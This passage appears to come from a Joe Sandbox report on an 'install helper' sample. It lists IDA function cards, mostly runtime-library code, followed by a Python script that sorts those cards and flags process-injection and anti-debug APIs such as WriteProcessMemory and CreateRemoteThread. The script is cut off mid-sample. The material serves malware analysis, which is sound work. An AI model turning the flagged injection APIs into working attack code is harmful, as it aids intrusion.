                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                          • Instruction ID: 004697f8595dc0c7d42ae9754df75e5d914e1f360d48bf4209bb525e9be64299
                                                          • Opcode Fuzzy Hash: 72c1d2a683874879174d131ccb4dddd1e2f70cb764b1e7878fe2ff4eea78678e
                                                          • Instruction Fuzzy Hash: 953114277A840103C70CCE3BCC1679F91535BE562A70ECF796C05DEF55D52CC8124144
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                                          • Instruction ID: c8689d927c3a903895052a2a746cf45e2cfd4334818ae3161f65ae48bd39cc1e
                                                          • Opcode Fuzzy Hash: f18cd9d9e139bd055bb212acf8773c3fe54c7ac8df6eb17b1ef3fe2716829738
                                                          • Instruction Fuzzy Hash: C5219077320A064BE74C8A38D83737532D0A705318F98A22DEA6BCE2C2D73AC457C785
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73b2c9c62382944de1616b5b6cc4261e3d9160605a97cdfc134f4d4d8cdd27bb
                                                          • Instruction ID: b582f58ef9d89abc5c1e11b0751ff9cf61f5b141b5523e36bc66aa846b7e71ca
                                                          • Opcode Fuzzy Hash: 73b2c9c62382944de1616b5b6cc4261e3d9160605a97cdfc134f4d4d8cdd27bb
                                                          • Instruction Fuzzy Hash: F4F01C32A25324EBCF129A88C405B8972F8EB45B65F120096A505AB640C7B4EE409BD0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction ID: 27b7c54eb5953770e97a6f6115d744d7e92beb3f018496988b6269d356fe27ef
                                                          • Opcode Fuzzy Hash: 1cade3b8bd37eadd8f509832e5cf264ebb44d36771f29a864de074982515b943
                                                          • Instruction Fuzzy Hash: A1E08C72A12338EBCB15EF88C900E8AB3ECEB45A05B220496B501D3610D670EE00CBD0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                                          • Instruction ID: 9e775abeed684ca77467d17cca6977048c68fff2285a19e0a564aa4dd6adc1c9
                                                          • Opcode Fuzzy Hash: 152ca77b835acdaa31470eaeb3eb3d3d2907b0f4df8f431f6db191a7075f4f47
                                                          • Instruction Fuzzy Hash: 27C002F6609606AF970CCF1FA480415FBE9FAD8321324C23FA02DC3700C77198258B64
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: @$p&L$p&L$p&L$p&L$p&L$p&L$p&L$p&L
                                                          • API String ID: 3519838083-609671
                                                          • Opcode ID: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction ID: 7865b96e59aa96583483558e8f843adaac20d1103eda7a5f271e5c98267cca84
                                                          • Opcode Fuzzy Hash: 484af5ae81cb977d174bd25b2e3a21fa57463062f16cd0331cc52001b19bc208
                                                          • Instruction Fuzzy Hash: 45D10639A04209DFCF11CFB4D990BEEB7B5FF15309F244059E455A3A50DB78AA89CBA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$H_prolog
                                                          • String ID: >WJ$x$x
                                                          • API String ID: 2300968129-3162267903
                                                          • Opcode ID: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                                          • Instruction ID: e33a0365a2df44057f2b78608595da2dc0114758c1d5eba51e75b198ba34a44f
                                                          • Opcode Fuzzy Hash: 949a4121937ebe046e830a9d183576ad129ffcf0ce56193b78953cd7febb835e
                                                          • Instruction Fuzzy Hash: A2127A7190421DEFDF10DFA4C880AEDBBB5FF18318F208569E915ABA50DB3A9A45CF50
                                                          APIs
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C0C9B07
                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6C0C9B0F
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C0C9B98
                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6C0C9BC3
                                                          • _ValidateLocalCookies.LIBCMT ref: 6C0C9C18
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                          • String ID: csm
                                                          • API String ID: 1170836740-1018135373
                                                          • Opcode ID: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                                          • Instruction ID: 248b647b548985cc82dbf524d41ab9795b036e2e42ce8fb00be39b9ab36ca4e7
                                                          • Opcode Fuzzy Hash: 574c35736542fef7e946819408ce086c63a3bcd5095cb97ff8614b559e84b30c
                                                          • Instruction Fuzzy Hash: 0A418E34B10219ABCF00DF68C884BDEBBF5AF4521CF158155E8159BB51DB36AA05CF92
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: api-ms-$ext-ms-
                                                          • API String ID: 0-537541572
                                                          • Opcode ID: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                                          • Instruction ID: f21468d2327a1c8a36667c154faf9d3c29340ae8e33a855014bdc6422798d3b2
                                                          • Opcode Fuzzy Hash: a16d7719c9976ac93a9f56ff10b02b8115264c911c3c76374620fdca8f52ff7d
                                                          • Instruction Fuzzy Hash: 8221C632A56B31BBDB114B69CC40B0A36E89F07768F170A50EC25E7A80DB30FD0085E2
                                                          APIs
                                                          • GetConsoleCP.KERNEL32(?,6C0DB0D0,?), ref: 6C0DBEF9
                                                          • __fassign.LIBCMT ref: 6C0DC0D8
                                                          • __fassign.LIBCMT ref: 6C0DC0F5
                                                          • WriteFile.KERNEL32(?,6C0E5AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC13D
                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6C0DC17D
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C0DC229
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: FileWrite__fassign$ConsoleErrorLast
                                                          • String ID:
                                                          • API String ID: 4031098158-0
                                                          • Opcode ID: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                                          • Instruction ID: c6a783d8a3aa24b557a54ea31d28ae4ce6ea9288a7d22d1f334704c3e870e5b0
                                                          • Opcode Fuzzy Hash: 8fa92671b9c314e3712189758fcac46d9bcbff4da4cb6fe4ffe0270df0fa99f6
                                                          • Instruction Fuzzy Hash: F4D19B75E012989FCF11CFE8C880AEDBBF5BF49314F25415AE856AB241D631AA46CF50
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92F95
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6BF92FAF
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF92FD0
                                                          • __Getctype.LIBCPMT ref: 6BF93084
                                                          • std::_Facet_Register.LIBCPMT ref: 6BF9309C
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6BF930B7
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                                          • String ID:
                                                          • API String ID: 1102183713-0
                                                          • Opcode ID: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                                          • Instruction ID: e9dd71bfa0bf4bc6e2a47e18f1249ae8981637b791f996d232dc01af1ec136ac
                                                          • Opcode Fuzzy Hash: 4faed9959ad98cc8acd1679f194cfd9f0c04b953e9f0870b18e7f43f66b2bcf8
                                                          • Instruction Fuzzy Hash: 90418DB2E042548FEB14DF98D854BAEBBF0FF44714F004159D829AB760D739AA04CF91
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: __aulldiv$__aullrem
                                                          • String ID:
                                                          • API String ID: 2022606265-0
                                                          • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction ID: 46df268e7501fd47bc41ac3def7f9f26c10e0fb9678d60b13b5ed515b16c951c
                                                          • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                                          • Instruction Fuzzy Hash: AA219E70A01219BBDF208E948C80EDF7E69FF467A8F248626B52461694DA71CD60CAE5
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C10A6F1
                                                            • Part of subcall function 6C119173: __EH_prolog.LIBCMT ref: 6C119178
                                                          • __EH_prolog.LIBCMT ref: 6C10A8F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: IJ$WIJ$J
                                                          • API String ID: 3519838083-740443243
                                                          • Opcode ID: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction ID: 3d75961bfbc3dadb5d5bb7696bd7823ca9d2605f34140845fe26f0392871312f
                                                          • Opcode Fuzzy Hash: 6052f957e2ecb8a4b70827f611eacceb93b83a0f35a243b049cc0090dc05215c
                                                          • Instruction Fuzzy Hash: F071AE30A04255DFDB04CF68C484BDDB7F0BF14308F1080AAD8656BB91CB75BA4ACB90
                                                          APIs
                                                          • _free.LIBCMT ref: 6C0E5ADD
                                                          • _free.LIBCMT ref: 6C0E5B06
                                                          • SetEndOfFile.KERNEL32(00000000,6C0E46EC,00000000,6C0DB0D0,?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000), ref: 6C0E5B38
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C0E46EC,6C0DB0D0,00000000,?,?,?,?,00000000,?), ref: 6C0E5B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFileLast
                                                          • String ID: 8Q
                                                          • API String ID: 1547350101-4022487301
                                                          • Opcode ID: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                                          • Instruction ID: f9b46d84d014247ce8a0782a893b4207617b708860e57c09b5155c60f4872154
                                                          • Opcode Fuzzy Hash: a451bc28115d49609fdcf5070d76ca9ece7f9cc1fc6ee75b3339e06a11aa14ba
                                                          • Instruction Fuzzy Hash: DB41CB3A640615AFDB019BB8CC81BCE37F5EF4D328F290951E424D7B90EB34E4458B61
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 6C11E41D
                                                            • Part of subcall function 6C11EE40: __EH_prolog.LIBCMT ref: 6C11EE45
                                                            • Part of subcall function 6C11E8EB: __EH_prolog.LIBCMT ref: 6C11E8F0
                                                            • Part of subcall function 6C11E593: __EH_prolog.LIBCMT ref: 6C11E598
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: &qB$0aJ$A0$XqB
                                                          • API String ID: 3519838083-1326096578
                                                          • Opcode ID: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction ID: 75037fd76694717641aeb8acc3d10ed11bbb21d6ba83c55f7acdb7e8ee61ca51
                                                          • Opcode Fuzzy Hash: 37b22e6d00aae0832323933771e16052884702a18d16bc22ef1d28b2cb01d7a1
                                                          • Instruction Fuzzy Hash: 3C21BB71D05258EACB04CBE4D984AECBBF4AF15318F20406AE82263B81DB781F4CCB60
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C0F8000, based on PE: true
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmp
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: H_prolog
                                                          • String ID: J$0J$DJ$`J
                                                          • API String ID: 3519838083-2453737217
                                                          • Opcode ID: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                          • Instruction ID: 4b5b7cda04984f89d3b6d0abd72616754e08991b0bcff2de465d5458bec061c4
                                                          • Opcode Fuzzy Hash: 94eb96797db7bdd6310de836df89d4e5c2fb6b25f25e237953e0bbd1ee8067ab
                                                          • Instruction Fuzzy Hash: DF11C2B1904B64CEC720DF5AC45429AFBE4BFA6708B10C91FC4A687F50C7F8A549CB99
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF13F
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0CF152
                                                          • FreeLibrary.KERNEL32(00000000,?,?,6C0CF1B4,?,?,6C0CF235,?,?,?), ref: 6C0CF175
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.1961971982.000000006BF41000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BF40000, based on PE: true
                                                          • Associated: 00000006.00000002.1961944811.000000006BF40000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963403655.000000006C0E8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1963479404.000000006C0F8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964075919.000000006C1C3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964110138.000000006C1C9000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                          • Associated: 00000006.00000002.1964811575.000000006C2B2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_6bf40000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                                          • Instruction ID: 4db272fd0deddf028ff289affeeb73d8fa6864d18cb08b5b1976edd9c1d8df20
                                                          • Opcode Fuzzy Hash: d8474030e9de05c9e9d4dafa6830db1a737e308ce5b32c77afc1ae690dbe63c1
                                                          • Instruction Fuzzy Hash: 6AF08C31601119FBDF02AB90DD19B9E7EF8EB0575AF211060FC15E2490CF708B40DA92
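Most of the function cards in this section are statically linked MSVC CRT and STL code rather than the sample's own logic: the GetModuleHandleExW("mscoree.dll") / GetProcAddress("CorExitProcess") / FreeLibrary triple is the CRT exit path probing for a loaded CLR, and __dosmaperr, ___initconout, _free and the std::_Lockit refs are all LIBCMT/LIBCPMT. The Python below is an added triage helper written for this page, not part of the Joe Sandbox report or its IDA plugin: it parses cards in this report's text layout and buckets each function so the ones that reference capability-relevant Win32 APIs are read first. The API name sets, the CRT string idiom and the second card in the constructed sample are assumptions for the example, not data from the report; it runs on any card in this format, not only the ones shown here.

```python
"""Triage helper for the per-function cards Joe Sandbox's IDA plugin emits
("APIs / Strings / Memory Dump Source / Similarity" blocks): buckets each
function as capability, win32, no-api or crt/stl so the interesting ones are read first."""
import re
from dataclasses import dataclass, field

LIB_MODULES = {"LIBCMT", "LIBCPMT"}  # how IDA/Joe label static CRT and STL refs
# Compiler-emitted helpers carry no signal (every C++ EH function has a prolog).
COMPILER_HELPERS = {"__EH_prolog", "__EH_prolog3", "__SEH_prolog4", "__aulldiv", "__allmul"}
# Win32 APIs the CRT calls from its own internals; a function whose Win32 calls
# all sit in this set, beside LIBCMT/LIBCPMT refs, is statically linked CRT code.
CRT_PLUMBING_APIS = {"GetLastError", "SetLastError", "CloseHandle", "CreateFileW",
                     "GetModuleHandleExW", "GetProcAddress", "FreeLibrary",
                     "SetFilePointerEx", "WriteConsoleW", "TlsGetValue", "TlsSetValue"}
# String sets that mark a CRT routine even without LIBCMT refs:
# mscoree.dll + CorExitProcess is the CRT exit path probing for the CLR.
CRT_STRING_IDIOMS = [frozenset({"CorExitProcess", "mscoree.dll"})]
# Assumed triage list (not from the report); extend it for your own hunt.
CAPABILITY_APIS = {"CreateProcessW", "CreateProcessA", "WriteProcessMemory",
                   "VirtualAllocEx", "CreateRemoteThread", "ResumeThread",
                   "NtSetInformationThread", "DeviceIoControl", "IsDebuggerPresent"}
# "• Name.MODULE(args), ref: ADDR" or "• __helper.LIBCMT ref: ADDR". The indented
# "• Part of subcall function ..." lines match neither regex and are skipped on
# purpose: they describe callees, not this function.
API_RE = re.compile(r"^\s*•\s*(?P<name>[^\s(.]+)\.(?P<module>[A-Za-z0-9_]+)"
                    r".*?\bref:\s*(?P<ref>[0-9A-Fa-f]+)")
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")


@dataclass
class FunctionCard:
    apis: list = field(default_factory=list)   # (name, module, ref) direct calls
    strings: set = field(default_factory=set)  # "String ID" split on '$'
    offset: str = ""                           # image base of the source dump


def parse_cards(text):
    """Split a report dump into cards; a card ends at its Instruction Fuzzy Hash."""
    cards, cur = [], FunctionCard()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur.apis.append((m["name"], m["module"], m["ref"]))
            continue
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, val = m["key"].strip(), m["val"].strip()
        if key == "Source File":
            off = re.search(r"Offset:\s*([0-9A-Fa-f]+)", val)
            cur.offset = off.group(1) if off else ""
        elif key == "String ID":
            cur.strings = {s for s in val.split("$") if s}
        elif key == "Instruction Fuzzy Hash":   # last field of every card
            cards.append(cur)
            cur = FunctionCard()
    return cards


def classify(card):
    direct = [(n, m) for n, m, _ in card.apis if n not in COMPILER_HELPERS]
    win32 = {n for n, m in direct if m not in LIB_MODULES}
    lib = {n for n, m in direct if m in LIB_MODULES}
    if win32 & CAPABILITY_APIS:
        return "capability"
    if any(idiom <= card.strings for idiom in CRT_STRING_IDIOMS):
        return "crt/stl"
    if lib and win32 <= CRT_PLUMBING_APIS:
        return "crt/stl"
    return "win32" if win32 else "no-api"


def triage(text):
    """Return {bucket: [FunctionCard, ...]} with the capability bucket first."""
    buckets = {"capability": [], "win32": [], "no-api": [], "crt/stl": []}
    for card in parse_cards(text):
        buckets[classify(card)].append(card)
    return buckets


# Constructed input: the first card is copied from this report (argument lists
# abridged, only the fields the parser reads kept); the second is made up to
# exercise the capability bucket and is NOT a function seen in the sample.
SAMPLE = """\
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6C0CF1B4), ref: 6C0CF13F
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6C0CF152
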